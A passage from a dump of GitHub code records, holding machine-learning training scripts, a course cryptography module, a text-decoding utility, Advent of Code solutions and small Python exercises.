model.save_pretrained(save_path)\n tokenizer.save_pretrained(save_path)\n logger.info(f\"best ours acc:{best_ours_acc}\")\n if hc3_val_acc >= best_hc3_acc:\n best_hc3_acc = hc3_val_acc\n save_path = args.save_path + os.sep + \"hc3\"\n model.save_pretrained(save_path)\n tokenizer.save_pretrained(save_path)\n logger.info(f\"best hc3 acc:{hc3_val_acc}\")\n\n global_step+=1\n \ndef parser_args():\n parser = argparse.ArgumentParser(description='train parameters')\n parser.add_argument('--train_path', default='debug_dataset/zh/train.jsonl', type=str)\n parser.add_argument('--hc3_val_path', default='debug_dataset/zh/val_hc3.jsonl', type=str)\n parser.add_argument('--ours_val_path', default='debug_dataset/zh/val_ours.jsonl', type=str)\n parser.add_argument('--model', default=\"chinese_tk_base\", type=str)\n parser.add_argument('--max_length', default=512,type=int)\n parser.add_argument('--batch_size',default=4,type=int)\n parser.add_argument('--save_path', default='model/debug', type=str,help=\"save folder\")\n parser.add_argument('--tensorboard_dir', default='tflog/debug', type=str,help=\"save folder\")\n parser.add_argument('--lr',default=5e-5,type=float)\n parser.add_argument('--weight_decay',default=0,type=float)\n parser.add_argument('--warm_up_ratio',default=0.0,type=float)\n parser.add_argument('--epochs',default=10,type=int)\n parser.add_argument('--num_test_times', default=1, type=int,\n help='number of verifications')\n parser.add_argument('--lang', default=\"zh\", type=str,\n help='language')\n parser.add_argument('--accumulation_steps', default=2, type=int) \n parser.add_argument('--seed', default=42, type=int)\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parser_args() \n main(args)","repo_name":"Saggressive/HC3","sub_path":"run_s2s.py","file_name":"run_s2s.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44066845978","text":"#coding=utf-8\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\nimport datetime\nslim = tf.contrib.slim\nimport model.pspnet as pspnet\n\nimport input_data\nimport utils.utils as Utils\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# for dataset\nflags.DEFINE_integer('height', 1024, 'The height of raw image.')\nflags.DEFINE_integer('width', 2048, 'The width of raw image.')\nflags.DEFINE_integer('crop_height', 768, 'The height of cropped image used for training.')\nflags.DEFINE_integer('crop_width', 768, 'The width of cropped image used for training.')\nflags.DEFINE_integer('channels', 3, 'The channels of input image.')\nflags.DEFINE_integer('ignore_label', 255, 'The ignore label value.')\nflags.DEFINE_integer('classes', 19, 'The ignore label value.')\n#flags.DEFINE_multi_float('rgb_mean', [123.15,115.90,103.06], 'RGB mean value of ImageNet.')\nflags.DEFINE_multi_float('rgb_mean', [72.39239876,82.90891754,73.15835921], 'RGB mean value of ImageNet.')\n\n# for augmentation\nflags.DEFINE_boolean('train_random_scales', True, 'whether to random scale.')\nflags.DEFINE_multi_float('scales', [0.5,0.75,1.0,1.25,1.5,1.75,2.0], 'Scales for random scale.')\nflags.DEFINE_boolean('train_random_mirror', True, 'whether to random mirror.')\n\nflags.DEFINE_boolean('val_random_scales', False, 'whether to random scale.')\nflags.DEFINE_boolean('val_random_mirror', False, 'whether to random mirror.')\n\n# for training configuration\nflags.DEFINE_integer('batch_size', 4, 'The number of images in each batch during training.')\nflags.DEFINE_integer('max_epoches', 40, 'The max epoches to train the model.')\nflags.DEFINE_integer('samples', 2975, 'The number of images used to train.')\n\nMAX_STEPS = FLAGS.max_epoches * FLAGS.samples // FLAGS.batch_size\n\n# for network configration\nflags.DEFINE_integer('output_stride', 16, 'output stride in the resnet model.')\n\n\n# network hyper-parameters\nflags.DEFINE_float('initial_lr', 1e-2, 'The initial learning rate.')\nflags.DEFINE_float('end_lr', 1e-6, 'The end learning rate.')\nflags.DEFINE_integer('decay_steps', 50000, 'Used for poly learning rate.')\nflags.DEFINE_float('weight_decay', 1e-4, 'The weight decay value for l2 regularization.')\nflags.DEFINE_float('power', 0.9, 'Used for poly learning rate.')\n\n# for saved configration\nflags.DEFINE_string('saved_ckpt_path', './checkpoint/', 'Path to save training checkpoint.')\nflags.DEFINE_string('saved_summary_train_path', './summary/train/', 'Path to save training summary.')\nflags.DEFINE_string('saved_summary_test_path', './summary/test/', 'Path to save test summary.')\nflags.DEFINE_string('pretrained_model_path', './resnet_v2_101_2017_04_14/resnet_v2_101.ckpt', 'Path to save test summary.')\n\n'''\n\ndef weighted_loss(logits, labels, num_classes, head=None, ignore=19):\n \"\"\"re-weighting\"\"\"\n with tf.name_scope('loss'):\n logits = tf.reshape(logits, (-1, num_classes))\n\n epsilon = tf.constant(value=1e-10)\n\n logits = logits + epsilon\n\n label_flat = tf.reshape(labels, (-1, 1))\n labels = tf.reshape(tf.one_hot(label_flat, depth=num_classes), (-1, num_classes))\n\n softmax = tf.nn.softmax(logits)\n\n #if head == None:\n # cross_entropy = -tf.reduce_sum(labels * tf.log(softmax + epsilon), axis=[1])\n #else:\n cross_entropy = -tf.reduce_sum(tf.multiply(labels * tf.log(softmax + epsilon), head), axis=[1])\n\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n\n return cross_entropy_mean\n\ndef cal_loss(logits, labels):\n\n\n #CLASS_NAMES = ['road', 'sidewalk', 'building', 'wall', 'fence', 'pole', 'traffic light', 'traffic sign', 'vegetation', 'terrain', 'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle']\n\n\n loss_weight = [3.045384, 12.862123, 4.509889, 38.15694, 35.25279, 31.482613, \\\n 45.792305, 39.694073, 6.0639296, 32.16484, 17.109228, 31.563286, \\\n 47.333973, 11.610675, 44.60042, 45.23716, 45.283024, 48.14782, 41.924667]\n loss_weight = np.array(loss_weight)\n\n labels = tf.cast(labels, tf.int32)\n\n # return loss(logits, labels)\n return weighted_loss(logits, labels, num_classes=CLASSES, head=loss_weight)\n'''\n\ndef cal_loss(logits, y, loss_weight=1.0):\n '''\n raw_prediction = tf.reshape(logits, [-1, CLASSES])\n raw_gt = tf.reshape(y, [-1])\n indices = tf.squeeze(tf.where(tf.less_equal(raw_gt, CLASSES - 1)), 1)\n gt = tf.cast(tf.gather(raw_gt, indices), tf.int32)\n prediction = tf.gather(raw_prediction, indices)\n # Pixel-wise softmax loss.\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=prediction, labels=gt)\n '''\n\n y = tf.reshape(y, shape=[-1])\n not_ignore_mask = tf.to_float(tf.not_equal(y,\n FLAGS.ignore_label)) * loss_weight\n one_hot_labels = tf.one_hot(\n y, FLAGS.classes, on_value=1.0, off_value=0.0)\n logits = tf.reshape(logits, shape=[-1, FLAGS.classes])\n loss = tf.losses.softmax_cross_entropy(onehot_labels=one_hot_labels, logits=logits, weights=not_ignore_mask)\n\n return tf.reduce_mean(loss)\n\n\nwith tf.name_scope('input'):\n x = tf.placeholder(dtype=tf.float32, shape=[FLAGS.batch_size, FLAGS.crop_height, FLAGS.crop_width, FLAGS.channels], name='x_input')\n y = tf.placeholder(dtype=tf.int32, shape=[FLAGS.batch_size, FLAGS.crop_height, FLAGS.crop_width], name='ground_truth')\n\nauxi_logits, logits = pspnet.PSPNet(x, is_training=True, output_stride=FLAGS.output_stride, pre_trained_model=FLAGS.pretrained_model_path, classes=FLAGS.classes)\n\n\nwith tf.name_scope('regularization'):\n train_var_list = [v for v in tf.trainable_variables()\n if 'beta' not in v.name and 'gamma' not in v.name]\n # Add weight decay to the loss.\n with tf.variable_scope(\"total_loss\"):\n l2_loss = FLAGS.weight_decay * tf.add_n(\n [tf.nn.l2_loss(v) for v in train_var_list])\n\nwith tf.name_scope('loss'):\n #reshaped_logits = tf.reshape(logits, [BATCH_SIZE, -1])\n #reshape_y = tf.reshape(y, [BATCH_SIZE, -1])\n #loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=reshape_y, logits=reshaped_logits), name='loss')\n #loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits), name='loss')\n loss_1 = cal_loss(logits, y)\n tf.summary.scalar('loss', loss_1)\n loss_2 = cal_loss(auxi_logits, y)\n loss_all = loss_1 + l2_loss\n #loss_all = loss\n tf.summary.scalar('loss_all', loss_all)\n\nwith tf.name_scope('learning_rate'):\n global_step = tf.Variable(0, trainable=False)\n lr = tf.train.polynomial_decay(\n learning_rate=FLAGS.initial_lr,\n global_step=global_step,\n decay_steps=FLAGS.decay_steps,\n end_learning_rate=FLAGS.end_lr,\n power=FLAGS.power,\n cycle=False,\n name=None\n )\n tf.summary.scalar('learning_rate', lr)\n\nwith tf.name_scope(\"opt\"):\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss_all, var_list=train_var_list, global_step=global_step)\n\n\nwith tf.name_scope(\"mIoU\"):\n softmax = tf.nn.softmax(logits, axis=-1)\n predictions = tf.argmax(softmax, axis=-1, name='predictions')\n\n train_mIoU = tf.Variable(0, dtype=tf.float32, trainable=False)\n tf.summary.scalar('train_mIoU', train_mIoU)\n test_mIoU = tf.Variable(0, dtype=tf.float32, trainable=False)\n tf.summary.scalar('test_mIoU',test_mIoU)\n\nmerged = tf.summary.merge_all()\n\nimage_batch_0, image_batch, anno_batch, filename = input_data.read_batch(FLAGS.batch_size, FLAGS.height, FLAGS.width, FLAGS.crop_height, FLAGS.crop_width, FLAGS.train_random_scales, FLAGS.scales, FLAGS.train_random_mirror, FLAGS.rgb_mean, type='train')\n\n\n_, image_batch_test, anno_batch_test, filename_test = input_data.read_batch(FLAGS.batch_size, FLAGS.height, FLAGS.width, FLAGS.crop_height, FLAGS.crop_width, FLAGS.val_random_scales, FLAGS.scales, FLAGS.val_random_mirror, FLAGS.rgb_mean, type='val')\n\nwith tf.Session() as sess:\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # if os.path.exists(saved_ckpt_path):\n ckpt = tf.train.get_checkpoint_state(FLAGS.saved_ckpt_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored...\")\n\n # saver.restore(sess, './checkpoint/PSPNet.model-30000')\n\n train_summary_writer = tf.summary.FileWriter(FLAGS.saved_summary_train_path, sess.graph)\n test_summary_writer = tf.summary.FileWriter(FLAGS.saved_summary_test_path, sess.graph)\n\n for i in range(0, MAX_STEPS + 1):\n\n b_image_0, b_image, b_anno, b_filename = sess.run([image_batch_0, image_batch, anno_batch, filename])\n\n b_image_test, b_anno_test, b_filename_test = sess.run([image_batch_test, anno_batch_test, filename_test])\n\n\n _ = sess.run(optimizer, feed_dict={x: b_image, y: b_anno})\n\n train_summary = sess.run(merged, feed_dict={x: b_image, y: b_anno})\n train_summary_writer.add_summary(train_summary, i)\n test_summary = sess.run(merged, feed_dict={x: b_image_test, y: b_anno_test})\n test_summary_writer.add_summary(test_summary, i)\n\n pred_train, train_loss_val_all, train_loss_val = sess.run([predictions, loss_all, loss_1], feed_dict={x: b_image, y: b_anno})\n pred_test, test_loss_val_all, test_loss_val = sess.run([predictions, loss_all, loss_1], feed_dict={x: b_image_test, y: b_anno_test})\n\n\n\n learning_rate = sess.run(lr)\n\n if i % 200 == 0:\n print(datetime.datetime.now().strftime(\"%Y.%m.%d-%H:%M:%S\"), \" | Step: %d | Train loss all: %f\" % (i, train_loss_val_all))\n\n if i % 1000 == 0:\n\n train_mIoU_val, train_IoU_val = Utils.cal_batch_mIoU(pred_train, b_anno, FLAGS.classes)\n test_mIoU_val, test_IoU_val = Utils.cal_batch_mIoU(pred_test, b_anno_test, FLAGS.classes)\n\n sess.run(tf.assign(train_mIoU, train_mIoU_val))\n sess.run(tf.assign(test_mIoU, test_mIoU_val))\n\n print('------------------------------')\n\n print(\n \"Step: %d | Lr: %f | Train loss all: %f | Train loss: %f | Train mIoU: %f | Test loss all: %f | Test loss: %f | Test mIoU: %f\" % (\n i, learning_rate, train_loss_val_all, train_loss_val, train_mIoU_val, test_loss_val_all, test_loss_val, test_mIoU_val))\n print('------------------------------')\n print(train_IoU_val)\n print(test_IoU_val)\n print('------------------------------')\n #prediction = tf.argmax(logits, axis=-1, name='predictions')\n\n if i % 1000 == 0:\n for j in range(FLAGS.batch_size):\n cv2.imwrite('images/img_%s' % b_filename[j], b_image_0[j])\n\n if i % 5000 == 0:\n saver.save(sess, os.path.join(FLAGS.saved_ckpt_path, 'pspnet.model'), global_step=i)\n\n\n coord.request_stop()\n coord.join(threads)\n\n\n\n\nif __name__ == '__main__':\n\n with tf.Session() as sess:\n input = tf.constant(0.1, shape=[2, 768, 768, 3])\n sess.run(tf.global_variables_initializer())\n\n for i in range(2):\n print(sess.run(auxi_logits)[0, 0, 0])\n print(sess.run(logits)[0, 0, 0])\n","repo_name":"zhulf0804/PSPNet-Tensorflow","sub_path":"old_version_tfrecord/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"10061256709","text":"import unittest\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n from numpy import load\n data = load('Data Files/cora_split_0.6_0.2_0.npz')\n lst = data.files\n\n for item in lst:\n print(item)\n print(sum(data[item]))\n print(data[item])\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jonyejin/DIL_GCN_Tutorial","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12193961339","text":"# n = input(\"Please enter your age: \")\r\n# # user types in 18\r\n# print(type(n))\r\n# test commint\r\n#teststt\r\n#yeygegfiefg\r\n#idhsfhriofgiodfh\r\n## test\r\n## test\r\n\r\n\r\np_phrase = \"was it a car or a cat I saw\"\r\n\r\nr_phrase = reversed(p_phrase)\r\nr_phrase = \"\".join(list(r_phrase))\r\nif r_phrase == p_phrase:\r\n print(\"It is palindrome\")\r\nelse:\r\n print(\"It is not\")\r\n\r\n print(\"////////////////////////////\")\r\nlist1= [5, 2, 1, 4, 9, 10]\r\nmin_value = list1[0]\r\nfor item in list1:\r\n if item < min_value:\r\n min_value = item\r\nprint(min_value)","repo_name":"zxuerdas/hello_world","sub_path":"course3_wk1.py","file_name":"course3_wk1.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34663108929","text":"\nimport click, ciphers, mac\nfrom keystore_new import *\nimport os\nfrom packet import Packet\nfrom sealed_object import SealedObject\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\nmodes_ls = dict(\n CBC = modes.CBC,\n CFB = modes.CFB8\n)\n\ndef decrypt_RC4(connection, outfile):\n\n ks = KeyStore('enc_key.store', os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)[0:15]\n\n print(key)\n\n cipher = Cipher(algorithms.ARC4(key), None, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt = decryptor.update(ct)\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\ndef decrypt_AES(connection, outfile, keystore, mode_name='CBC'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n ks = KeyStore(keystore, os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)\n\n mode_ = modes_ls[mode_name](iv)\n\n cipher = Cipher(algorithms.AES(key), mode_, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt = decryptor.update(ct)\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\ndef accept_session_packet(connection, keystore, mode_name='CFB'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n ks = KeyStore(keystore, os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)\n\n ct = b\"\"\n #while True:\n chunk = connection.recv(512)\n #if not chunk:\n #break\n ct += chunk\n\n so = SealedObject()\n packet = so.deserialize(ct)\n\n cipher = ciphers.KeyAES(key, 'CFB8', False, packet.iv)\n sk = cipher.decrypt(packet.msg)\n\n #send private key\n connection.sendall(ct)\n\n\n #click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n return sk\n\ndef decrypt_AES_with_key_mac(connection, outfile, s_key, hmac, mode_name='CFB8'):\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n so = SealedObject()\n packet = so.deserialize(ct)\n\n #verify mac\n if not hmac.verMAC(packet.msg, packet.mac):\n #reject\n click.echo(click.style('Decryptionphailed', bold = True, fg = 'red'))\n else:\n cipher = ciphers.KeyAES(s_key, 'CFB8', False, packet.iv)\n dt = cipher.decrypt(packet.msg)\n\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\n\n\ndef decrypt_AES_with_key(connection, outfile, key, mode_name='CFB'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n mode_ = modes_ls[mode_name](iv)\n\n click.echo(click.style('DEBUG : Decrypting with key %s' % key, bold = True, fg = 'yellow'))\n\n cipher = Cipher(algorithms.AES(key), mode_, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt = decryptor.update(ct) + decryptor.finalize()\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n","repo_name":"diogom93/ssre","sub_path":"tut5/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19496832613","text":"import abc\nfrom typing import Iterable\n\nfrom . import EncodedChunkStream\nfrom . import DecodedChunkStream\nfrom llm_retrieval.document.chunk import DecodedChunk\nfrom llm_retrieval.utils.common.utf8 import lstrip_continuation_bytes\nfrom llm_retrieval.utils.common.utf8 import truncation_point\n\n\nclass EncodedToDecodedChunkStreamConverter(abc.ABC):\n\n @abc.abstractmethod\n def decode(self, encoded_chunk_stream: 'EncodedChunkStream') -> DecodedChunkStream:\n \"\"\"Decode a stream of encoded chunks into a stream of decoded chunks.\n\n Raises:\n UnicodeDecodeError: If the encoded chunks cannot be decoded.\n \"\"\"\n pass\n\n\nclass EncodedToDecodedChunkStreamConverterWithSplitCharacterHealing(EncodedToDecodedChunkStreamConverter):\n\n def decode(self, encoded_chunk_stream: 'EncodedChunkStream') -> DecodedChunkStream:\n \"\"\"Decode a stream of encoded chunks into a stream of decoded chunks.\n\n The encoded chunks may be split in the middle of a character. This method will\n attempt to heal the split by prepending the split bytes to the next chunk, if\n the next chunk is contiguous. Otherwise, the split bytes will be discarded.\n\n Raises:\n UnicodeDecodeError: If the encoded chunks cannot be decoded.\n \"\"\"\n\n if encoded_chunk_stream.encoding.lower() != 'utf-8':\n raise NotImplementedError(f'Only utf-8 encoding is supported.')\n\n def converted_stream() -> Iterable[DecodedChunk]:\n truncated_bytes = b''\n start = 0\n\n for encoded_chunk in encoded_chunk_stream:\n\n if encoded_chunk.start - len(truncated_bytes) != start:\n truncated_bytes = b''\n start = encoded_chunk.start\n encoded_chunk_bytes = lstrip_continuation_bytes(encoded_chunk.data)\n else:\n encoded_chunk_bytes = truncated_bytes + encoded_chunk.data\n\n split = truncation_point(encoded_chunk_bytes)\n\n if split < len(encoded_chunk_bytes):\n truncated_bytes = encoded_chunk_bytes[split:]\n encoded_chunk_bytes = encoded_chunk_bytes[:split]\n else:\n truncated_bytes = b''\n\n if encoded_chunk_bytes:\n end = start + len(encoded_chunk_bytes)\n yield DecodedChunk(encoded_chunk_bytes.decode(encoded_chunk_stream.encoding), start, end, encoded_chunk_stream.encoding)\n start = end\n\n return DecodedChunkStream(encoded_chunk_stream.encoding).append(converted_stream())\n","repo_name":"callumcurtis/llm-retrieval-stack","sub_path":"llm_retrieval/document/chunk/stream/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7651092026","text":"\nfrom datetime import datetime\nimport logging\nimport os\nfrom typing import Optional\n\nfrom expats.settings import SETTINGS\n\n\nDEFAULT_LOG_DIR = os.path.join(\n SETTINGS.home_root_path, f\"log/{datetime.now().strftime('%Y%m%d_%H:%M')}\"\n)\nLOG_FILENAME = \"log.txt\"\n\n\ndef init_setup_log(log_dir: Optional[str] = None):\n \"\"\"setup logging to be called only once at initial stage\n\n Args:\n log_dir (Optional[str]): path tp logging directory. Defaults to None, which means DEFAULT_LOG_DIR.\n \"\"\"\n _log_dir = log_dir if log_dir else DEFAULT_LOG_DIR\n if not os.path.exists(_log_dir):\n os.makedirs(_log_dir)\n\n root_logger = logging.getLogger()\n if SETTINGS.is_debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n log_path = os.path.join(_log_dir, LOG_FILENAME)\n file_handler = logging.FileHandler(log_path)\n fmt = logging.Formatter(\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\")\n file_handler.setFormatter(fmt)\n root_logger.addHandler(file_handler)\n\n\ndef get_logger(name: Optional[str] = None):\n return logging.getLogger(name)\n","repo_name":"octanove/expats","sub_path":"expats/common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"28122201945","text":"from os import path\nfrom typing import Dict, List\nfrom pprint import pprint\n\n\ndef get_edges() -> Dict[str, List[str]]:\n # with open(\"input_test.txt\", 'r') as f:\n # with open(\"input_test_2.txt\", 'r') as f:\n # with open(\"input_test_3.txt\", 'r') as f:\n with open(\"input.txt\", \"r\") as f:\n edge_map = {}\n for line in f.read().splitlines():\n a, b = line.split(\"-\")\n if edge_map.get(a):\n edge_map[a] = edge_map[a] + [b]\n else:\n edge_map[a] = [b]\n if edge_map.get(b):\n edge_map[b] = edge_map[b] + [a]\n else:\n edge_map[b] = [a]\n return edge_map\n\n\ndef find_paths(\n edge_map: Dict[str, List[str]], path: List[str], all_paths: List[List[str]]\n):\n cur_node = path[-1]\n\n if cur_node == \"end\": # full path found\n all_paths.append(path)\n return\n\n cur_path_length = len(path)\n for next_node in edge_map[cur_node]:\n if (\n next_node not in path or next_node.isupper()\n ): # check the current node hasn't been visited or is an upper case big cave\n path = path + [next_node]\n find_paths(edge_map, path, all_paths)\n # set path to always be at the cur_node at this point\n path = path[:cur_path_length]\n\n return all_paths\n\n\nif __name__ == \"__main__\":\n edge_map = get_edges()\n print(edge_map)\n print(\"****\")\n paths = find_paths(edge_map, [\"start\"], [])\n pprint(paths)\n print(len(paths))\n","repo_name":"AaronElijah/AdventOfCode2021","sub_path":"Day12/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11304316467","text":"\"\"\"--- Part Two ---\n\n\"Great work; looks like we're on the right track after all. Here's a star for\nyour effort.\" However, the program seems a little worried. Can programs be\nworried?\n\n\"Based on what we're seeing, it looks like all the User wanted is some information\nabout the evenly divisible values in the spreadsheet. Unfortunately, none of\nus are equipped for that kind of calculation - most of us specialize in bitwise\noperations.\"\n\nIt sounds like the goal is to find the only two numbers in each row where one\nevenly divides the other - that is, where the result of the division operation\nis a whole number. They would like you to find those numbers on each line, divide\nthem, and add up each line's result.\n\nFor example, given the following spreadsheet:\n\n5 9 2 8\n9 4 7 3\n3 8 6 5\n\nIn the first row, the numbers that evenly divide are 8 and 2; the result is 4.\nIn the second row, the two numbers are 9 and 3; the result is 3.\nIn the third row, the result is 2.\n\nIn this example, the sum of the results would be 4 + 3 + 2 = 9.\n\nWhat is the sum of each row's result in your puzzle input?\n\"\"\"\n\ndef test_row_division():\n assert row_division(\"5 9 2 8\") == 4\n assert row_division(\"9 4 7 3\") == 3\n assert row_division(\"3 8 6 5\") == 2\n\n\ndef test_spreadsheet_checksum():\n test_spreadsheet = \"5 9 2 8\\n9 4 7 3\\n3 8 6 5\"\n assert spreadsheet_checksum(test_spreadsheet) == 9\n\n\ndef row_division(row):\n \"\"\"Given a string of numbers, divides the ones that are evenly divisible and returns the result\n\n As the problem specifies, we'll assume that only one pair of numbers is\n evenly divisible\n\n The numbers must be separated by any whitespace character.\"\"\"\n\n numbers = [int(char) for char in row.split()]\n\n # Sorting the array makes us not needing to worry about the numbers at the\n # left of the one we're currently examinating\n numbers.sort(reverse=True)\n\n # We'll examine all the possibilities by brute-force.\n # This is not a good approach, but as the spreadsheet is quite small (16x16),\n # we don't have much to worry about\n for i in range(len(numbers)):\n for j in range(i + 1, len(numbers)):\n int_division = numbers[i] / numbers[j]\n exact_division = numbers[i] / float(numbers[j])\n\n if int_division == exact_division:\n return int_division\n\ndef spreadsheet_checksum(spreadsheet):\n \"\"\"Given a spreadsheet with numbers, computes its checksum\n\n The spreadsheet is expected to be a string where each line represents a row\n and where the numbers in each column are separated by a whitespace.\n\n The checksum is obtained by computing the division between the only two\n numbers of each row that are evenly divisible and then computing the sum\n of all these results.\"\"\"\n\n count = 0\n rows = spreadsheet.splitlines()\n\n for row in rows:\n count += row_division(row)\n\n return count\n\n\nif __name__ == '__main__':\n\n input_path = 'input.txt'\n input = open(input_path).read()\n\n result = spreadsheet_checksum(input)\n print(result)\n","repo_name":"AlexGascon/Advent-of-Code","sub_path":"2017/Day_2/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12245466693","text":"class Solution:\n def smallestEquivalentString(self, s1: str, s2: str, baseStr: str) -> str:\n def union(a, b):\n a = find(a)\n b = find(b)\n\n if a < b:\n parents[b] = a\n else:\n parents[a] = b\n \n def find(x):\n if x not in parents:\n parents[x] = x\n \n if parents[x] != x:\n parents[x] = find(parents[x])\n \n return parents[x]\n\n parents = {}\n for c1, c2 in zip(s1, s2):\n union(c1, c2)\n print(c1, c2, parents)\n\n\n return ''.join([find(c) for c in baseStr])\n","repo_name":"Ma-due/PS-study","sub_path":"1weeks/1w-4d.py","file_name":"1w-4d.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73144310441","text":"#!/usr/bin/env python\nimport h5py\nimport matplotlib\nimport matplotlib.pyplot\nimport argparse\n\n\ndef view_pnccd(filename):\n with h5py.File(filename, \"r\") as file_handle:\n data1 = file_handle.values()[1].values()[3].value\n data2 = file_handle.values()[1].values()[4].value\n\n fig = matplotlib.pyplot.figure(1)\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n\n ax2.imshow(data1)\n ax1.imshow(data2)\n matplotlib.pyplot.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n args = parser.parse_args()\n\n view_pnccd(args.file)\n","repo_name":"ekeberg/Python-tools","sub_path":"Scripts/eke_view_pnccd.py","file_name":"eke_view_pnccd.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"36380746558","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = '0.0.1'\nDESCRIPTION = 'Converting sql to dbf files'\nLONG_DESCRIPTION = 'A package that allows to convert sql to dbf files.'\n\n# Setting up\nsetup(\n name=\"sql2dbf\",\n version=VERSION,\n author=\"NurlanEmilbekuulu (Nurlan Emilbek uulu)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(),\n install_requires=[],\n keywords=['python', 'sql', 'dbf', 'conversion'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"NurlanEmilbekuulu/sql2dbf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74820906599","text":"N = int(input())\narr = [int(input()) for _ in range(N)]\nans = 0\nstack = []\nfor i in range(1, N+1):\n while stack:\n if stack[-1][1] > arr[i-1]:\n ans += len(stack)\n break\n else:\n stack.pop()\n stack.append([i, arr[i-1]])\nprint(ans)","repo_name":"CYoungSun/TIL","sub_path":"백준/스택/6198.옥상 정원 꾸미기.py","file_name":"6198.옥상 정원 꾸미기.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"36671764213","text":"import os\nimport 